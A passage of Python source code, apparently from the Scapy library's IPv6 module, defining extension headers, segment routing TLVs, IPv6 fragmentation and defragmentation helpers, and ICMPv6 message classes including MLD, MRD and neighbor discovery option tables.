953 overload_fields = {IPv6: {"nh": 0}} 

954 

955 

956# Destination Option Header # 

957 

958class IPv6ExtHdrDestOpt(_IPv6ExtHdr): 

959 name = "IPv6 Extension Header - Destination Options Header" 

960 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

961 FieldLenField("len", None, length_of="options", fmt="B", 

962 adjust=lambda pkt, x: (x + 2 + 7) // 8 - 1), 

963 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

964 _OptionsField("options", [], HBHOptUnknown, 2, 

965 length_from=lambda pkt: (8 * (pkt.len + 1)) - 2)] # noqa: E501 

966 overload_fields = {IPv6: {"nh": 60}} 

967 

968 

969# Routing Header # 

970 

971class IPv6ExtHdrRouting(_IPv6ExtHdr): 

972 name = "IPv6 Option Header Routing" 

973 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

974 FieldLenField("len", None, count_of="addresses", fmt="B", 

975 adjust=lambda pkt, x:2 * x), # in 8 bytes blocks # noqa: E501 

976 ByteField("type", 0), 

977 ByteField("segleft", None), 

978 BitField("reserved", 0, 32), # There is meaning in this field ... # noqa: E501 

979 IP6ListField("addresses", [], 

980 length_from=lambda pkt: 8 * pkt.len)] 

981 overload_fields = {IPv6: {"nh": 43}} 

982 

983 def post_build(self, pkt, pay): 

984 if self.segleft is None: 

985 pkt = pkt[:3] + struct.pack("B", len(self.addresses)) + pkt[4:] 

986 return _IPv6ExtHdr.post_build(self, pkt, pay) 

987 

988 

989# Segment Routing Header # 

990 

991# This implementation is based on RFC8754, but some older snippets come from: 

992# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06 

993 

994_segment_routing_header_tlvs = { 

995 # RFC 8754 sect 8.2 

996 0: "Pad1 TLV", 

997 1: "Ingress Node TLV", # draft 06 

998 2: "Egress Node TLV", # draft 06 

999 4: "PadN TLV", 

1000 5: "HMAC TLV", 

1001} 

1002 

1003 

1004class IPv6ExtHdrSegmentRoutingTLV(Packet): 

1005 name = "IPv6 Option Header Segment Routing - Generic TLV" 

1006 # RFC 8754 sect 2.1 

1007 fields_desc = [ByteEnumField("type", None, _segment_routing_header_tlvs), 

1008 ByteField("len", 0), 

1009 StrLenField("value", "", length_from=lambda pkt: pkt.len)] 

1010 

1011 def extract_padding(self, p): 

1012 return b"", p 

1013 

1014 registered_sr_tlv = {} 

1015 

1016 @classmethod 

1017 def register_variant(cls): 

1018 cls.registered_sr_tlv[cls.type.default] = cls 

1019 

1020 @classmethod 

1021 def dispatch_hook(cls, pkt=None, *args, **kargs): 

1022 if pkt: 

1023 tmp_type = ord(pkt[:1]) 

1024 return cls.registered_sr_tlv.get(tmp_type, cls) 

1025 return cls 

1026 

1027 

1028class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV): 

1029 name = "IPv6 Option Header Segment Routing - Ingress Node TLV" 

1030 # draft-ietf-6man-segment-routing-header-06 3.1.1 

1031 fields_desc = [ByteEnumField("type", 1, _segment_routing_header_tlvs), 

1032 ByteField("len", 18), 

1033 ByteField("reserved", 0), 

1034 ByteField("flags", 0), 

1035 IP6Field("ingress_node", "::1")] 

1036 

1037 

1038class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV): 

1039 name = "IPv6 Option Header Segment Routing - Egress Node TLV" 

1040 # draft-ietf-6man-segment-routing-header-06 3.1.2 

1041 fields_desc = [ByteEnumField("type", 2, _segment_routing_header_tlvs), 

1042 ByteField("len", 18), 

1043 ByteField("reserved", 0), 

1044 ByteField("flags", 0), 

1045 IP6Field("egress_node", "::1")] 

1046 

1047 

1048class IPv6ExtHdrSegmentRoutingTLVPad1(IPv6ExtHdrSegmentRoutingTLV): 

1049 name = "IPv6 Option Header Segment Routing - Pad1 TLV" 

1050 # RFC8754 sect 2.1.1.1 

1051 fields_desc = [ByteEnumField("type", 0, _segment_routing_header_tlvs), 

1052 FieldLenField("len", None, length_of="padding", fmt="B"), 

1053 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1054 

1055 

1056class IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 

1057 name = "IPv6 Option Header Segment Routing - PadN TLV" 

1058 # RFC8754 sect 2.1.1.2 

1059 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 

1060 FieldLenField("len", None, length_of="padding", fmt="B"), 

1061 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 

1062 

1063 

1064class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 

1065 name = "IPv6 Option Header Segment Routing - HMAC TLV" 

1066 # RFC8754 sect 2.1.2 

1067 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 

1068 FieldLenField("len", None, length_of="hmac", 

1069 adjust=lambda _, x: x + 48), 

1070 BitField("D", 0, 1), 

1071 BitField("reserved", 0, 15), 

1072 IntField("hmackeyid", 0), 

1073 StrLenField("hmac", "", 

1074 length_from=lambda pkt: pkt.len - 48)] 

1075 

1076 

1077class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 

1078 name = "IPv6 Option Header Segment Routing" 

1079 # RFC8754 sect 2. + flag bits from draft 06 

1080 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1081 ByteField("len", None), 

1082 ByteField("type", 4), 

1083 ByteField("segleft", None), 

1084 ByteField("lastentry", None), 

1085 BitField("unused1", 0, 1), 

1086 BitField("protected", 0, 1), 

1087 BitField("oam", 0, 1), 

1088 BitField("alert", 0, 1), 

1089 BitField("hmac", 0, 1), 

1090 BitField("unused2", 0, 3), 

1091 ShortField("tag", 0), 

1092 IP6ListField("addresses", ["::1"], 

1093 count_from=lambda pkt: (pkt.lastentry + 1)), 

1094 PacketListField("tlv_objects", [], 

1095 IPv6ExtHdrSegmentRoutingTLV, 

1096 length_from=lambda pkt: 8 * pkt.len - 16 * ( 

1097 pkt.lastentry + 1 

1098 ))] 

1099 

1100 overload_fields = {IPv6: {"nh": 43}} 

1101 

1102 def post_build(self, pkt, pay): 

1103 

1104 if self.len is None: 

1105 

1106 # The extension must be align on 8 bytes 

1107 tmp_mod = (-len(pkt) + 8) % 8 

1108 if tmp_mod == 1: 

1109 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 

1110 pkt += raw(tlv) 

1111 elif tmp_mod >= 2: 

1112 # Add the padding extension 

1113 tmp_pad = b"\x00" * (tmp_mod - 2) 

1114 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 

1115 pkt += raw(tlv) 

1116 

1117 tmp_len = (len(pkt) - 8) // 8 

1118 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 

1119 

1120 if self.segleft is None: 

1121 tmp_len = len(self.addresses) 

1122 if tmp_len: 

1123 tmp_len -= 1 

1124 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 

1125 

1126 if self.lastentry is None: 

1127 lastentry = len(self.addresses) 

1128 if lastentry == 0: 

1129 warning( 

1130 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 

1131 ) 

1132 else: 

1133 lastentry -= 1 

1134 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 

1135 

1136 return _IPv6ExtHdr.post_build(self, pkt, pay) 

1137 

1138 

1139# Fragmentation Header # 

1140 

1141class IPv6ExtHdrFragment(_IPv6ExtHdr): 

1142 name = "IPv6 Extension Header - Fragmentation header" 

1143 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

1144 BitField("res1", 0, 8), 

1145 BitField("offset", 0, 13), 

1146 BitField("res2", 0, 2), 

1147 BitField("m", 0, 1), 

1148 IntField("id", None)] 

1149 overload_fields = {IPv6: {"nh": 44}} 

1150 

1151 def guess_payload_class(self, p): 

1152 if self.offset > 0: 

1153 return Raw 

1154 else: 

1155 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 

1156 

1157 

1158def defragment6(packets): 

1159 """ 

1160 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 

1161 Crap is dropped. What lacks is completed by 'X' characters. 

1162 """ 

1163 

1164 # Remove non fragments 

1165 lst = [x for x in packets if IPv6ExtHdrFragment in x] 

1166 if not lst: 

1167 return [] 

1168 

1169 id = lst[0][IPv6ExtHdrFragment].id 

1170 

1171 llen = len(lst) 

1172 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 

1173 if len(lst) != llen: 

1174 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 

1175 

1176 # reorder fragments 

1177 res = [] 

1178 while lst: 

1179 min_pos = 0 

1180 min_offset = lst[0][IPv6ExtHdrFragment].offset 

1181 for p in lst: 

1182 cur_offset = p[IPv6ExtHdrFragment].offset 

1183 if cur_offset < min_offset: 

1184 min_pos = 0 

1185 min_offset = cur_offset 

1186 res.append(lst[min_pos]) 

1187 del lst[min_pos] 

1188 

1189 # regenerate the fragmentable part 

1190 fragmentable = b"" 

1191 frag_hdr_len = 8 

1192 for p in res: 

1193 q = p[IPv6ExtHdrFragment] 

1194 offset = 8 * q.offset 

1195 if offset != len(fragmentable): 

1196 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 

1197 frag_data_len = p[IPv6].plen 

1198 if frag_data_len is not None: 

1199 frag_data_len -= frag_hdr_len 

1200 fragmentable += b"X" * (offset - len(fragmentable)) 

1201 fragmentable += raw(q.payload)[:frag_data_len] 

1202 

1203 # Regenerate the unfragmentable part. 

1204 q = res[0].copy() 

1205 nh = q[IPv6ExtHdrFragment].nh 

1206 q[IPv6ExtHdrFragment].underlayer.nh = nh 

1207 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 

1208 del q[IPv6ExtHdrFragment].underlayer.payload 

1209 q /= conf.raw_layer(load=fragmentable) 

1210 del q.plen 

1211 

1212 if q[IPv6].underlayer: 

1213 q[IPv6] = IPv6(raw(q[IPv6])) 

1214 else: 

1215 q = IPv6(raw(q)) 

1216 return q 

1217 

1218 

1219def fragment6(pkt, fragSize): 

1220 """ 

1221 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 

1222 expected maximum size of fragment data (MTU). The list of packets is 

1223 returned. 

1224 

1225 If packet does not contain an IPv6ExtHdrFragment class, it is added to 

1226 first IPv6 layer found. If no IPv6 layer exists packet is returned in 

1227 result list unmodified. 

1228 """ 

1229 

1230 pkt = pkt.copy() 

1231 

1232 if IPv6ExtHdrFragment not in pkt: 

1233 if IPv6 not in pkt: 

1234 return [pkt] 

1235 

1236 layer3 = pkt[IPv6] 

1237 data = layer3.payload 

1238 frag = IPv6ExtHdrFragment(nh=layer3.nh) 

1239 

1240 layer3.remove_payload() 

1241 del layer3.nh 

1242 del layer3.plen 

1243 

1244 frag.add_payload(data) 

1245 layer3.add_payload(frag) 

1246 

1247 # If the payload is bigger than 65535, a Jumbo payload must be used, as 

1248 # an IPv6 packet can't be bigger than 65535 bytes. 

1249 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 

1250 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 

1251 return [] 

1252 

1253 s = raw(pkt) # for instantiation to get upper layer checksum right 

1254 

1255 if len(s) <= fragSize: 

1256 return [pkt] 

1257 

1258 # Fragmentable part : fake IPv6 for Fragmentable part length computation 

1259 fragPart = pkt[IPv6ExtHdrFragment].payload 

1260 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 

1261 fragPartLen = len(tmp) - 40 # basic IPv6 header length 

1262 fragPartStr = s[-fragPartLen:] 

1263 

1264 # Grab Next Header for use in Fragment Header 

1265 nh = pkt[IPv6ExtHdrFragment].nh 

1266 

1267 # Keep fragment header 

1268 fragHeader = pkt[IPv6ExtHdrFragment] 

1269 del fragHeader.payload # detach payload 

1270 

1271 # Unfragmentable Part 

1272 unfragPartLen = len(s) - fragPartLen - 8 

1273 unfragPart = pkt 

1274 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 

1275 

1276 # Cut the fragmentable part to fit fragSize. Inner fragments have 

1277 # a length that is an integer multiple of 8 octets. last Frag MTU 

1278 # can be anything below MTU 

1279 lastFragSize = fragSize - unfragPartLen - 8 

1280 innerFragSize = lastFragSize - (lastFragSize % 8) 

1281 

1282 if lastFragSize <= 0 or innerFragSize == 0: 

1283 warning("Provided fragment size value is too low. " + 

1284 "Should be more than %d" % (unfragPartLen + 8)) 

1285 return [unfragPart / fragHeader / fragPart] 

1286 

1287 remain = fragPartStr 

1288 res = [] 

1289 fragOffset = 0 # offset, incremeted during creation 

1290 fragId = random.randint(0, 0xffffffff) # random id ... 

1291 if fragHeader.id is not None: # ... except id provided by user 

1292 fragId = fragHeader.id 

1293 fragHeader.m = 1 

1294 fragHeader.id = fragId 

1295 fragHeader.nh = nh 

1296 

1297 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 

1298 while True: 

1299 if (len(remain) > lastFragSize): 

1300 tmp = remain[:innerFragSize] 

1301 remain = remain[innerFragSize:] 

1302 fragHeader.offset = fragOffset # update offset 

1303 fragOffset += (innerFragSize // 8) # compute new one 

1304 if IPv6 in unfragPart: 

1305 unfragPart[IPv6].plen = None 

1306 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 

1307 res.append(tempo) 

1308 else: 

1309 fragHeader.offset = fragOffset # update offSet 

1310 fragHeader.m = 0 

1311 if IPv6 in unfragPart: 

1312 unfragPart[IPv6].plen = None 

1313 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 

1314 res.append(tempo) 

1315 break 

1316 return res 

1317 

1318 

1319############################################################################# 

1320############################################################################# 

1321# ICMPv6* Classes # 

1322############################################################################# 

1323############################################################################# 

1324 

1325 

1326icmp6typescls = {1: "ICMPv6DestUnreach", 

1327 2: "ICMPv6PacketTooBig", 

1328 3: "ICMPv6TimeExceeded", 

1329 4: "ICMPv6ParamProblem", 

1330 128: "ICMPv6EchoRequest", 

1331 129: "ICMPv6EchoReply", 

1332 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 

1333 131: "ICMPv6MLReport", 

1334 132: "ICMPv6MLDone", 

1335 133: "ICMPv6ND_RS", 

1336 134: "ICMPv6ND_RA", 

1337 135: "ICMPv6ND_NS", 

1338 136: "ICMPv6ND_NA", 

1339 137: "ICMPv6ND_Redirect", 

1340 # 138: Do Me - RFC 2894 - Seems painful 

1341 139: "ICMPv6NIQuery", 

1342 140: "ICMPv6NIReply", 

1343 141: "ICMPv6ND_INDSol", 

1344 142: "ICMPv6ND_INDAdv", 

1345 143: "ICMPv6MLReport2", 

1346 144: "ICMPv6HAADRequest", 

1347 145: "ICMPv6HAADReply", 

1348 146: "ICMPv6MPSol", 

1349 147: "ICMPv6MPAdv", 

1350 # 148: Do Me - SEND related - RFC 3971 

1351 # 149: Do Me - SEND related - RFC 3971 

1352 151: "ICMPv6MRD_Advertisement", 

1353 152: "ICMPv6MRD_Solicitation", 

1354 153: "ICMPv6MRD_Termination", 

1355 # 154: Do Me - FMIPv6 Messages - RFC 5568 

1356 155: "ICMPv6RPL", # RFC 6550 

1357 } 

1358 

1359icmp6typesminhdrlen = {1: 8, 

1360 2: 8, 

1361 3: 8, 

1362 4: 8, 

1363 128: 8, 

1364 129: 8, 

1365 130: 24, 

1366 131: 24, 

1367 132: 24, 

1368 133: 8, 

1369 134: 16, 

1370 135: 24, 

1371 136: 24, 

1372 137: 40, 

1373 # 139: 

1374 # 140 

1375 141: 8, 

1376 142: 8, 

1377 143: 8, 

1378 144: 8, 

1379 145: 8, 

1380 146: 8, 

1381 147: 8, 

1382 151: 8, 

1383 152: 4, 

1384 153: 4, 

1385 155: 4 

1386 } 

1387 

1388icmp6types = {1: "Destination unreachable", 

1389 2: "Packet too big", 

1390 3: "Time exceeded", 

1391 4: "Parameter problem", 

1392 100: "Private Experimentation", 

1393 101: "Private Experimentation", 

1394 128: "Echo Request", 

1395 129: "Echo Reply", 

1396 130: "MLD Query", 

1397 131: "MLD Report", 

1398 132: "MLD Done", 

1399 133: "Router Solicitation", 

1400 134: "Router Advertisement", 

1401 135: "Neighbor Solicitation", 

1402 136: "Neighbor Advertisement", 

1403 137: "Redirect Message", 

1404 138: "Router Renumbering", 

1405 139: "ICMP Node Information Query", 

1406 140: "ICMP Node Information Response", 

1407 141: "Inverse Neighbor Discovery Solicitation Message", 

1408 142: "Inverse Neighbor Discovery Advertisement Message", 

1409 143: "MLD Report Version 2", 

1410 144: "Home Agent Address Discovery Request Message", 

1411 145: "Home Agent Address Discovery Reply Message", 

1412 146: "Mobile Prefix Solicitation", 

1413 147: "Mobile Prefix Advertisement", 

1414 148: "Certification Path Solicitation", 

1415 149: "Certification Path Advertisement", 

1416 151: "Multicast Router Advertisement", 

1417 152: "Multicast Router Solicitation", 

1418 153: "Multicast Router Termination", 

1419 155: "RPL Control Message", 

1420 200: "Private Experimentation", 

1421 201: "Private Experimentation"} 

1422 

1423 

1424class _ICMPv6(Packet): 

1425 name = "ICMPv6 dummy class" 

1426 overload_fields = {IPv6: {"nh": 58}} 

1427 

1428 def post_build(self, p, pay): 

1429 p += pay 

1430 if self.cksum is None: 

1431 chksum = in6_chksum(58, self.underlayer, p) 

1432 p = p[:2] + struct.pack("!H", chksum) + p[4:] 

1433 return p 

1434 

1435 def hashret(self): 

1436 return self.payload.hashret() 

1437 

1438 def answers(self, other): 

1439 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 

1440 if (isinstance(self.underlayer, IPerror6) or 

1441 isinstance(self.underlayer, _IPv6ExtHdr) and 

1442 isinstance(other, _ICMPv6)): 

1443 if not ((self.type == other.type) and 

1444 (self.code == other.code)): 

1445 return 0 

1446 return 1 

1447 return 0 

1448 

1449 

1450class _ICMPv6Error(_ICMPv6): 

1451 name = "ICMPv6 errors dummy class" 

1452 

1453 def guess_payload_class(self, p): 

1454 return IPerror6 

1455 

1456 

1457class ICMPv6Unknown(_ICMPv6): 

1458 name = "Scapy6 ICMPv6 fallback class" 

1459 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1460 ByteField("code", 0), 

1461 XShortField("cksum", None), 

1462 StrField("msgbody", "")] 

1463 

1464 

1465# RFC 2460 # 

1466 

1467class ICMPv6DestUnreach(_ICMPv6Error): 

1468 name = "ICMPv6 Destination Unreachable" 

1469 fields_desc = [ByteEnumField("type", 1, icmp6types), 

1470 ByteEnumField("code", 0, {0: "No route to destination", 

1471 1: "Communication with destination administratively prohibited", # noqa: E501 

1472 2: "Beyond scope of source address", # noqa: E501 

1473 3: "Address unreachable", 

1474 4: "Port unreachable"}), 

1475 XShortField("cksum", None), 

1476 ByteField("length", 0), 

1477 X3BytesField("unused", 0), 

1478 _ICMPExtensionPadField(), 

1479 _ICMPExtensionField()] 

1480 post_dissection = _ICMP_extpad_post_dissection 

1481 

1482 

1483class ICMPv6PacketTooBig(_ICMPv6Error): 

1484 name = "ICMPv6 Packet Too Big" 

1485 fields_desc = [ByteEnumField("type", 2, icmp6types), 

1486 ByteField("code", 0), 

1487 XShortField("cksum", None), 

1488 IntField("mtu", 1280)] 

1489 

1490 

1491class ICMPv6TimeExceeded(_ICMPv6Error): 

1492 name = "ICMPv6 Time Exceeded" 

1493 fields_desc = [ByteEnumField("type", 3, icmp6types), 

1494 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 

1495 1: "fragment reassembly time exceeded"}), # noqa: E501 

1496 XShortField("cksum", None), 

1497 ByteField("length", 0), 

1498 X3BytesField("unused", 0), 

1499 _ICMPExtensionPadField(), 

1500 _ICMPExtensionField()] 

1501 post_dissection = _ICMP_extpad_post_dissection 

1502 

1503 

1504# The default pointer value is set to the next header field of 

1505# the encapsulated IPv6 packet 

1506 

1507 

1508class ICMPv6ParamProblem(_ICMPv6Error): 

1509 name = "ICMPv6 Parameter Problem" 

1510 fields_desc = [ByteEnumField("type", 4, icmp6types), 

1511 ByteEnumField( 

1512 "code", 0, 

1513 {0: "erroneous header field encountered", 

1514 1: "unrecognized Next Header type encountered", 

1515 2: "unrecognized IPv6 option encountered", 

1516 3: "first fragment has incomplete header chain"}), 

1517 XShortField("cksum", None), 

1518 IntField("ptr", 6)] 

1519 

1520 

1521class ICMPv6EchoRequest(_ICMPv6): 

1522 name = "ICMPv6 Echo Request" 

1523 fields_desc = [ByteEnumField("type", 128, icmp6types), 

1524 ByteField("code", 0), 

1525 XShortField("cksum", None), 

1526 XShortField("id", 0), 

1527 XShortField("seq", 0), 

1528 StrField("data", "")] 

1529 

1530 def mysummary(self): 

1531 return self.sprintf("%name% (id: %id% seq: %seq%)") 

1532 

1533 def hashret(self): 

1534 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 

1535 

1536 

1537class ICMPv6EchoReply(ICMPv6EchoRequest): 

1538 name = "ICMPv6 Echo Reply" 

1539 type = 129 

1540 

1541 def answers(self, other): 

1542 # We could match data content between request and reply. 

1543 return (isinstance(other, ICMPv6EchoRequest) and 

1544 self.id == other.id and self.seq == other.seq and 

1545 self.data == other.data) 

1546 

1547 

1548# ICMPv6 Multicast Listener Discovery (RFC2710) # 

1549 

1550# tous les messages MLD sont emis avec une adresse source lien-locale 

1551# -> Y veiller dans le post_build si aucune n'est specifiee 

1552# La valeur de Hop-Limit doit etre de 1 

1553# "and an IPv6 Router Alert option in a Hop-by-Hop Options 

1554# header. (The router alert option is necessary to cause routers to 

1555# examine MLD messages sent to multicast addresses in which the router 

1556# itself has no interest" 

1557class _ICMPv6ML(_ICMPv6): 

1558 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1559 ByteField("code", 0), 

1560 XShortField("cksum", None), 

1561 ShortField("mrd", 0), 

1562 ShortField("reserved", 0), 

1563 IP6Field("mladdr", "::")] 

1564 

1565# general queries are sent to the link-scope all-nodes multicast 

1566# address ff02::1, with a multicast address field of 0 and a MRD of 

1567# [Query Response Interval] 

1568# Default value for mladdr is set to 0 for a General Query, and 

1569# overloaded by the user for a Multicast Address specific query 

1570# TODO : See what we can do to automatically include a Router Alert 

1571# Option in a Destination Option Header. 

1572 

1573 

1574class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 

1575 name = "MLD - Multicast Listener Query" 

1576 type = 130 

1577 mrd = 10000 # 10s for mrd 

1578 mladdr = "::" 

1579 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1580 

1581 

1582# TODO : See what we can do to automatically include a Router Alert 

1583# Option in a Destination Option Header. 

1584class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 

1585 name = "MLD - Multicast Listener Report" 

1586 type = 131 

1587 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 

1588 

1589 def answers(self, query): 

1590 """Check the query type""" 

1591 return ICMPv6MLQuery in query 

1592 

1593# When a node ceases to listen to a multicast address on an interface, 

1594# it SHOULD send a single Done message to the link-scope all-routers 

1595# multicast address (FF02::2), carrying in its multicast address field 

1596# the address to which it is ceasing to listen 

1597# TODO : See what we can do to automatically include a Router Alert 

1598# Option in a Destination Option Header. 

1599 

1600 

1601class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 

1602 name = "MLD - Multicast Listener Done" 

1603 type = 132 

1604 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 

1605 

1606 

1607# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 

1608 

1609class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 

1610 name = "MLDv2 - Multicast Listener Query" 

1611 fields_desc = [ByteEnumField("type", 130, icmp6types), 

1612 ByteField("code", 0), 

1613 XShortField("cksum", None), 

1614 ShortField("mrd", 10000), 

1615 ShortField("reserved", 0), 

1616 IP6Field("mladdr", "::"), 

1617 BitField("Resv", 0, 4), 

1618 BitField("S", 0, 1), 

1619 BitField("QRV", 0, 3), 

1620 ByteField("QQIC", 0), 

1621 ShortField("sources_number", None), 

1622 IP6ListField("sources", [], 

1623 count_from=lambda pkt: pkt.sources_number)] 

1624 

1625 # RFC8810 - 4. Message Formats 

1626 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 

1627 

1628 def post_build(self, packet, payload): 

1629 """Compute the 'sources_number' field when needed""" 

1630 if self.sources_number is None: 

1631 srcnum = struct.pack("!H", len(self.sources)) 

1632 packet = packet[:26] + srcnum + packet[28:] 

1633 return _ICMPv6.post_build(self, packet, payload) 

1634 

1635 

1636class ICMPv6MLDMultAddrRec(Packet): 

1637 name = "ICMPv6 MLDv2 - Multicast Address Record" 

1638 fields_desc = [ByteField("rtype", 4), 

1639 FieldLenField("auxdata_len", None, 

1640 length_of="auxdata", 

1641 fmt="B"), 

1642 FieldLenField("sources_number", None, 

1643 length_of="sources", 

1644 adjust=lambda p, num: num // 16), 

1645 IP6Field("dst", "::"), 

1646 IP6ListField("sources", [], 

1647 length_from=lambda p: 16 * p.sources_number), 

1648 StrLenField("auxdata", "", 

1649 length_from=lambda p: p.auxdata_len)] 

1650 

1651 def default_payload_class(self, packet): 

1652 """Multicast Address Record followed by another one""" 

1653 return self.__class__ 

1654 

1655 

1656class ICMPv6MLReport2(_ICMPv6): # RFC 3810 

1657 name = "MLDv2 - Multicast Listener Report" 

1658 fields_desc = [ByteEnumField("type", 143, icmp6types), 

1659 ByteField("res", 0), 

1660 XShortField("cksum", None), 

1661 ShortField("reserved", 0), 

1662 ShortField("records_number", None), 

1663 PacketListField("records", [], 

1664 ICMPv6MLDMultAddrRec, 

1665 count_from=lambda p: p.records_number)] 

1666 

1667 # RFC8810 - 4. Message Formats 

1668 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 

1669 

1670 def post_build(self, packet, payload): 

1671 """Compute the 'records_number' field when needed""" 

1672 if self.records_number is None: 

1673 recnum = struct.pack("!H", len(self.records)) 

1674 packet = packet[:6] + recnum + packet[8:] 

1675 return _ICMPv6.post_build(self, packet, payload) 

1676 

1677 def answers(self, query): 

1678 """Check the query type""" 

1679 return isinstance(query, ICMPv6MLQuery2) 

1680 

1681 

1682# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 

1683 

1684# TODO: 

1685# - 04/09/06 troglocan : find a way to automatically add a router alert 

1686# option for all MRD packets. This could be done in a specific 

1687# way when IPv6 is the under layer with some specific keyword 

1688# like 'exthdr'. This would allow to keep compatibility with 

1689# providing IPv6 fields to be overloaded in fields_desc. 

1690# 

1691# At the moment, if user inserts an IPv6 Router alert option 

1692# none of the IPv6 default values of IPv6 layer will be set. 

1693 

1694class ICMPv6MRD_Advertisement(_ICMPv6): 

1695 name = "ICMPv6 Multicast Router Discovery Advertisement" 

1696 fields_desc = [ByteEnumField("type", 151, icmp6types), 

1697 ByteField("advinter", 20), 

1698 XShortField("cksum", None), 

1699 ShortField("queryint", 0), 

1700 ShortField("robustness", 0)] 

1701 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1702 # IPv6 Router Alert requires manual inclusion 

1703 

1704 def extract_padding(self, s): 

1705 return s[:8], s[8:] 

1706 

1707 

1708class ICMPv6MRD_Solicitation(_ICMPv6): 

1709 name = "ICMPv6 Multicast Router Discovery Solicitation" 

1710 fields_desc = [ByteEnumField("type", 152, icmp6types), 

1711 ByteField("res", 0), 

1712 XShortField("cksum", None)] 

1713 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 

1714 # IPv6 Router Alert requires manual inclusion 

1715 

1716 def extract_padding(self, s): 

1717 return s[:4], s[4:] 

1718 

1719 

1720class ICMPv6MRD_Termination(_ICMPv6): 

1721 name = "ICMPv6 Multicast Router Discovery Termination" 

1722 fields_desc = [ByteEnumField("type", 153, icmp6types), 

1723 ByteField("res", 0), 

1724 XShortField("cksum", None)] 

1725 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 

1726 # IPv6 Router Alert requires manual inclusion 

1727 

1728 def extract_padding(self, s): 

1729 return s[:4], s[4:] 

1730 

1731 

1732# ICMPv6 Neighbor Discovery (RFC 2461) # 

1733 

1734icmp6ndopts = {1: "Source Link-Layer Address", 

1735 2: "Target Link-Layer Address", 

1736 3: "Prefix Information", 

1737 4: "Redirected Header", 

1738 5: "MTU", 

1739 6: "NBMA Shortcut Limit Option", # RFC2491 

1740 7: "Advertisement Interval Option", 

1741 8: "Home Agent Information Option", 

1742 9: "Source Address List", 

1743 10: "Target Address List", 

1744 11: "CGA Option", # RFC 3971 

1745 12: "RSA Signature Option", # RFC 3971 

1746 13: "Timestamp Option", # RFC 3971 

1747 14: "Nonce option", # RFC 3971 

1748 15: "Trust Anchor Option", # RFC 3971 

1749 16: "Certificate Option", # RFC 3971 

1750 17: "IP Address Option", # RFC 4068 

1751 18: "New Router Prefix Information Option", # RFC 4068 

1752 19: "Link-layer Address Option", # RFC 4068 

1753 20: "Neighbor Advertisement Acknowledgement Option", 

1754 21: "CARD Request Option", # RFC 4065/4066/4067 

1755 22: "CARD Reply Option", # RFC 4065/4066/4067 

1756 23: "MAP Option", # RFC 4140 

1757 24: "Route Information Option", # RFC 4191 

1758 25: "Recursive DNS Server Option", 

1759 26: "IPv6 Router Advertisement Flags Option" 

1760 } 

1761 

1762icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 

1763 2: "ICMPv6NDOptDstLLAddr", 

1764 3: "ICMPv6NDOptPrefixInfo", 

1765 4: "ICMPv6NDOptRedirectedHdr", 

1766 5: "ICMPv6NDOptMTU", 

1767 6: "ICMPv6NDOptShortcutLimit", 

1768 7: "ICMPv6NDOptAdvInterval", 

1769 8: "ICMPv6NDOptHAInfo", 

